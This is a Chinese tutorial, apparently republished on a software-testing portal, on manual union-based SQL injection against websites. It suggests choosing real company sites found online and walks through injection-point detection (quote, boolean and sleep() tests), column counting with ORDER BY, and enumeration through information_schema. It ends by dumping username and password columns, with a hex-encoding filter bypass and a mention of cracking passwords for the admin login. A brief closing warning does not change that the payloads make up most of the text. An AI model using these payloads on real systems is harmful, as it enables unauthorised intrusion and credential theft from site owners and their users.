渗透测试之sql注入验证安全与攻击性能

发表于:2021-9-13 09:35

字体: | 上一篇 | 下一篇 | 我要投稿

 作者:ganfd    来源:博客园

  由于渗透测试牵涉到安全性以及攻击性,为了便于交流分享,本人这里不进行具体网址的透露了。
  我们可以在网上查找一些公司官方网站如(http://www.XXXXXX.com/xxxx?id=1)
  1、拿到网页后进行查找注入点;
  查找注入点的方法可以浏览上一篇文章,这里可以收藏订阅作者的博客园,以便后面发出的文章不被错过;下面再 分享一次如何寻找注入点:
  1)通过单引号 ' ;    在 url 后面输入单引号进行回车(如果报错可能存在sql注入为:10%左右) 。
  2)利用逻辑运算(在 url 后面 输入 and 1=1 正常;1=2不正常,sql 注入漏洞概率为:40-60%左右)。
  3)利用沉睡函数俗称摸鱼函数(在 url 后面输入sleep(10),网页会休眠停留10s ,休眠与网速有关所以sql 注入漏洞概率为:50%左右)。
  4)利用运算进行测试(eg:id=1 则可以修改为id=2-1或3-2 ,+-×÷都能够进行计算并跑通,sql 注入漏洞概率为:95-100%左右)。
  2、进行测试报字段通过(order by函数);我的字段是9
  在url后面加上order by XXX(整数)  利用XXX多次进行寻找临界值(报错与不报错边缘)。
  3、通过寻找到的字段后进行联合查询
  URL + union select 1,2,3,4,5,6,7,8,9(会出现字段序号对应的位置,1不要变因为通常第一位是序号,后面数字只是占位置可以改变) 。
  4、查询数据库
  URL + union select 1,2,database(),4,5,6,7,8,9(database(),所占位置当然也是可以改变的的,不要占用1,就行)。
  5、查询数据库版本号
  URL + union select 1,2,3,4,version(),6,7,8,9  (version(),所占位置当然也是可以改变的的,不要占用1,就行)。
  查询数据库版本的目的是因为一旦mysql版本大于5.0必然会有默认库information,如下:
  我们通常使用的默认库是:information_schema 
  6、查询数据库中的表名;
  URL + union select 1,2,3,4,group_concat(table_name),6,7,8,9,from information_schema.tables where table_schema=database()    可以查出所有表的表名。
  7、直接爆出表中用户;
  URL + union select 1,2,3,4,group_concat(column_name),6,7,8,9,from information_schema.columns where table_name='表名'   
  注:有时候开发很聪明会对代码进行特殊字符进行过滤,那么我们就需要进行绕过去,我们可以对’表名‘进行转换为16进制或别的都行然后再进行输入查询。
  8、查看表中所有信息内容;
  URL + union select 1,2,3,4,group_concat(usename,0x7e,password),6,7,8,9,from 表名则可以查出所有用户具体信息。
  9、我这里如何破解后台网址以及登录就不再详细演示了(注意密码可能需要进行尝试解密)
  提倡网络安全切勿在法律边缘游走,不要随意攻击别人网站。

  本文内容不用于商业目的,如涉及知识产权问题,请权利人联系51Testing小编(021-64471599-8017),我们将立即处理
《2023软件测试行业现状调查报告》独家发布~

关注51Testing

联系我们

快捷面板 站点地图 联系我们 广告服务 关于我们 站长统计 发展历程

法律顾问:上海兰迪律师事务所 项棋律师
版权所有 上海博为峰软件技术股份有限公司 Copyright©51testing.com 2003-2024
投诉及意见反馈:webmaster@51testing.com; 业务联系:service@51testing.com 021-64471599-8017

沪ICP备05003035号

沪公网安备 31010102002173号